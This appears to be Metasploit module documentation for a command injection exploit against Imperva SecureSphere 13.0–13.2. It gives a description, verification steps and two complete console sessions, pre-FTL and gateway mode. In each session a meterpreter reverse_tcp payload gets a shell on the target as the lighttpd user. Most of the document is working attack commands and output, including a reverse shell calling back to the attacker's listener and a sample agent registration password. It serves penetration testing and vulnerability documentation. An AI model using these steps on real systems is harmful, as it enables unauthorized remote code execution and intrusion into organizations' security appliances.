8.5 KiB
8.5 KiB
Description
This module exploits a command injection vulnerability in Imperva SecureSphere 13.x. The vulnerability exists in the PWS service, where Python CGIs didn't properly sanitize user supplied command parameters and directly passes them to corresponding CLI utility, leading to command injection. Agent registration credential is required to exploit SecureSphere in gateway mode.
Vulnerable Application
Imperva SecureSphere 13.0/13.1/13.2
Verification Steps
use exploit/linux/http/imperva_securesphere_execset RHOST [TARGET IP]set PASS [Agent registration password]if the target has been set to gateway mode- Run
check - Verify that the result is
The target is vulnerable. set payload linux/x64/meterpreter/reverse_tcpset LHOST [IP]- Run
exploit - Verify that the reverse shell is obtained
Scenarios
Imperva Secure 13.0 Pre-FTL mode:
msf5 > use exploit/linux/http/imperva_securesphere_exec
msf5 exploit(linux/http/imperva_securesphere_exec) > set RHOST 192.168.146.201
RHOST => 192.168.146.201
msf5 exploit(linux/http/imperva_securesphere_exec) > check
[+] 192.168.146.201:443 The target is vulnerable.
msf5 exploit(linux/http/imperva_securesphere_exec) > set payload linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp
msf5 exploit(linux/http/imperva_securesphere_exec) > set LHOST 192.168.146.215
LHOST => 192.168.146.215
msf5 exploit(linux/http/imperva_securesphere_exec) > show options
Module options (exploit/linux/http/imperva_securesphere_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
PASS no Agent registration password
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 192.168.146.201 yes The target address range or CIDR identifier
RPORT 443 yes The target port (TCP)
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 8080 yes The local port to listen on.
SSL true no Use SSL
SSLCert no Path to a custom SSL certificate (default is randomly generated)
TARGETURI /pws/impcli no The URI path to impcli
TIMEOUT 3 no HTTP connection timeout
URIPATH no The URI to use for this exploit (default is random)
USER imperva no Agent registration username
VHOST no HTTP server virtual host
Payload options (linux/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.146.215 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Imperva SecureSphere 13.0/13.1/13.2
msf5 exploit(linux/http/imperva_securesphere_exec) > exploit
[*] Started reverse TCP handler on 192.168.146.215:4444
[*] Sending payload linux/x64/meterpreter/reverse_tcp
[*] Sending stage (816260 bytes) to 192.168.146.201
[*] Command Stager progress - 100.00% done (1321/1321 bytes)
meterpreter > sysinfo
Computer : localhost.localdomain
OS : Red Hat 6.3 (Linux 2.6.32-279.el6.imp8.numa.x86_64)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
meterpreter > shell
Process 4965 created.
Channel 1 created.
id
uid=497(lighttpd) gid=497(lighttpd) groups=497(lighttpd)
/sbin/ifconfig
eth0 Link encap:Ethernet HWaddr 00:0C:29:DE:50:99
inet addr:192.168.146.201 Bcast:192.168.146.255 Mask:255.255.255.0
inet6 addr: fe80::20c:29ff:fede:5099/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:1331 errors:0 dropped:0 overruns:0 frame:0
TX packets:825 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:1790319 (1.7 MiB) TX bytes:83116 (81.1 KiB)
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:0 (0.0 b) TX bytes:0 (0.0 b)
exit
meterpreter > exit
[*] Shutting down Meterpreter...
[*] 192.168.146.201 - Meterpreter session 1 closed. Reason: User exit
Imperva SecureSphere 13.0 Gateway mode (Requires agent registration credential):
msf5 > use exploit/linux/http/imperva_securesphere_exec
msf5 exploit(linux/http/imperva_securesphere_exec) > set RHOST 192.168.146.201
RHOST => 192.168.146.201
msf5 exploit(linux/http/imperva_securesphere_exec) > set PASS lshy5782%lsLS
PASS => lshy5782%lsLS
msf5 exploit(linux/http/imperva_securesphere_exec) > check
[+] 192.168.146.201:443 The target is vulnerable.
msf5 exploit(linux/http/imperva_securesphere_exec) > set payload linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp
msf5 exploit(linux/http/imperva_securesphere_exec) > set LHOST 192.168.146.215
LHOST => 192.168.146.215
msf5 exploit(linux/http/imperva_securesphere_exec) > show options
Module options (exploit/linux/http/imperva_securesphere_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
PASS lshy5782%lsLS no Agent registration password
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 192.168.146.201 yes The target address range or CIDR identifier
RPORT 443 yes The target port (TCP)
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 8080 yes The local port to listen on.
SSL true no Use SSL
SSLCert no Path to a custom SSL certificate (default is randomly generated)
TARGETURI /pws/impcli no The URI path to impcli
TIMEOUT 3 no HTTP connection timeout
URIPATH no The URI to use for this exploit (default is random)
USER imperva no Agent registration username
VHOST no HTTP server virtual host
Payload options (linux/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.146.215 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Imperva SecureSphere 13.0/13.1/13.2
msf5 exploit(linux/http/imperva_securesphere_exec) > exploit
[*] Started reverse TCP handler on 192.168.146.215:4444
[*] Sending payload linux/x64/meterpreter/reverse_tcp
[*] Sending stage (816260 bytes) to 192.168.146.201
[*] Command Stager progress - 100.00% done (1321/1321 bytes)
meterpreter > sysinfo
Computer : 192.168.146.201
OS : Red Hat 6.3 (Linux 2.6.32-279.el6.imp8.numa.x86_64)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
meterpreter > shell
Process 19634 created.
Channel 1 created.
id
uid=497(lighttpd) gid=497(lighttpd) groups=497(lighttpd)
/sbin/ifconfig
eth0 Link encap:Ethernet HWaddr 00:0C:29:DE:50:99
inet addr:192.168.146.201 Bcast:192.168.146.255 Mask:255.255.255.0
inet6 addr: fe80::20c:29ff:fede:5099/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:651 errors:0 dropped:0 overruns:0 frame:0
TX packets:451 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:894174 (873.2 KiB) TX bytes:37181 (36.3 KiB)
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:153 errors:0 dropped:0 overruns:0 frame:0
TX packets:153 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:21579 (21.0 KiB) TX bytes:21579 (21.0 KiB)
exit
meterpreter > exit
[*] Shutting down Meterpreter...
[*] 192.168.146.201 - Meterpreter session 1 closed. Reason: User exit